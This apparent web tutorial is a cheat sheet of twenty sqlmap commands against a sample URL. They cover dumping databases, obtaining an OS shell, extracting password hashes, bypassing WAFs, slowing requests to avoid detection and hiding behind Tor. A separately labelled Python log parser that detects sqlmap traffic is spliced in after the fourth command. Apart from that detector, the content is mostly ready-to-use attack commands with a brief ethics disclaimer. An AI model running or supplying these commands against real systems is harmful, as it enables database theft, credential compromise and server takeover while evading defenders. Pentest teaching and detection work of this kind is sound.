Top 20 SQLmap Commands to Exploit SQL Injection Vulnerabilities


SQLmap is a powerful open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in database-driven applications.

Below are the top 20 sqlmap commands, each serving a unique purpose in database security assessments.

  1. Detect and Exploit SQL Injection
  2. Dump the Database Content
  3. Obtain an OS Shell
  4. Bypass WAF Using Tamper Scripts
  5. Use Hexadecimal Encoding for Payloads
  6. Specify Database Management System (DBMS)
  7. Retrieve DBMS User Privileges
  8. Advanced SQL Injection Testing
  9. Retrieve DBMS Password Hashes
  10. Retrieve DBMS Roles
  11. Retrieve Database Schema
  12. Count Table Entries
  13. Search for Specific Data
  14. Run SQLmap in Non-Interactive Mode
  15. Add Delay Between Requests
  16. Set a Timeout for Each Request
  17. Set the Number of Retries
  18. Use Tor Network for Anonymity
  19. Verify Tor Connectivity
  20. Use a Proxy for Requests

1. Detect and Exploit SQL Injection

sqlmap -u "http://10.228.12.20/page.php?id=1" --dbs

This command scans the target URL for SQL injection vulnerabilities and retrieves the available databases.

2. Dump the Database Content

sqlmap -u "http://10.228.12.20/page.php?id=1" --dump

Once an SQL injection vulnerability is found, this command extracts and dumps the database content.

3. Obtain an OS Shell

sqlmap -u "http://10.228.12.20/page.php?id=1" --os-shell

If the database user has sufficient privileges, this command provides access to an OS shell.

4. Bypass WAF Using Tamper Scripts

sqlmap -u "http://10.228.12.20/page.php?id=1" --tamper=space2comment

Bypasses web application firewalls (WAF) using tamper scripts.
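
On the defensive side, requests like these leave traces in web server access logs. The following is an added example, not part of the original article: it flags sqlmap's default User-Agent and the /**/ comment-as-space pattern that space2comment produces. The Combined Log Format, the indicator names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

# Combined Log Format: ip - - [time] "METHOD url PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SQL_WORDS = re.compile(r"\b(union|select|sleep|benchmark|information_schema)\b", re.I)


def classify(line):
    """Return (client_ip, indicators) for one access-log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None, set()          # unparseable line: nothing to report
    query = unquote_plus(urlsplit(m["url"]).query)   # decode %2F, %2A, + ...
    hits = set()
    if m["ua"].lower().startswith("sqlmap/"):
        hits.add("default-user-agent")
    if "/**/" in query:             # space2comment turns each space into /**/
        hits.add("comment-as-space")
    if SQL_WORDS.search(query):
        hits.add("sql-keyword-in-parameter")
    return m["ip"], hits


def summarize(lines):
    """Merge indicators per client IP, skipping clean requests."""
    per_ip = defaultdict(set)
    for line in lines:
        ip, hits = classify(line)
        if hits:
            per_ip[ip] |= hits
    return dict(per_ip)


# Constructed sample log lines (documentation IP ranges, made-up agent strings).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2025:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [12/Mar/2025:10:00:02 +0000] "GET /page.php?id=1%20AND%201%3D1 '
    'HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.5 - - [12/Mar/2025:10:00:03 +0000] "GET /page.php?id=1%2F%2A%2A%2FUNION'
    '%2F%2A%2A%2FSELECT%2F%2A%2A%2FNULL HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]

if __name__ == "__main__":
    for ip, hits in sorted(summarize(SAMPLE_LOG).items()):
        print(ip, sorted(hits))
```

The third sample line carries a browser-like User-Agent and is flagged by the shape of the parameter value alone, which is why payload-based indicators belong alongside the User-Agent check.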

5. Use Hexadecimal Encoding for Payloads

sqlmap -u "http://10.228.12.20/page.php?id=1" --hex

Encodes payloads in hexadecimal format to evade filters.

6. Specify Database Management System (DBMS)

sqlmap -u "http://10.228.12.20/page.php?id=1" --dbms=mysql

Defines the target DBMS to tailor SQLmap’s attack strategy.

7. Retrieve DBMS User Privileges

sqlmap -u "http://10.228.12.20/page.php?id=1" --privileges

Lists database user privileges.

8. Advanced SQL Injection Testing

sqlmap -u "http://10.228.12.20/page.php?id=1" --level=5 --risk=3

Increases the depth of SQL injection testing with high risk and level parameters.

9. Retrieve DBMS Password Hashes

sqlmap -u "http://10.228.12.20/page.php?id=1" --passwords

Extracts and displays password hashes stored in the database.

10. Retrieve DBMS Roles

sqlmap -u "http://10.228.12.20/page.php?id=1" --roles

Lists all roles assigned within the DBMS.

11. Retrieve Database Schema

sqlmap -u "http://10.228.12.20/page.php?id=1" --schema

Retrieves the overall database schema.

12. Count Table Entries

sqlmap -u "http://10.228.12.20/page.php?id=1" --count

Counts the number of entries in database tables.

13. Search for Specific Data

sqlmap -u "http://10.228.12.20/page.php?id=1" --search -T users --string="admin"

Searches for specific strings, such as “admin”, within database tables.

14. Run SQLmap in Non-Interactive Mode

sqlmap -u "http://10.228.12.20/page.php?id=1" --batch

Executes SQLmap without user prompts, automating the process.

15. Add Delay Between Requests

sqlmap -u "http://10.228.12.20/page.php?id=1" --delay=5

Adds a delay (in seconds) between HTTP requests to avoid detection.

16. Set a Timeout for Each Request

sqlmap -u "http://10.228.12.20/page.php?id=1" --timeout=10

Sets a timeout limit for each HTTP request.

17. Set the Number of Retries

sqlmap -u "http://10.228.12.20/page.php?id=1" --retries=3

Specifies how many times SQLmap should retry failed requests.

18. Use Tor Network for Anonymity

sqlmap -u "http://10.228.12.20/page.php?id=1" --tor

Routes traffic through the Tor network for anonymous testing.

19. Verify Tor Connectivity

sqlmap -u "http://10.228.12.20/page.php?id=1" --check-tor

Confirms whether SQLmap is correctly using the Tor network.

20. Use a Proxy for Requests

sqlmap -u "http://10.228.12.20/page.php?id=1" --proxy=http://127.0.0.1:8080

Routes SQLmap requests through a specified proxy.

Conclusion

These SQLmap commands help security professionals and penetration testers identify and exploit SQL injection vulnerabilities efficiently. However, they should only be used for ethical testing on authorized systems.
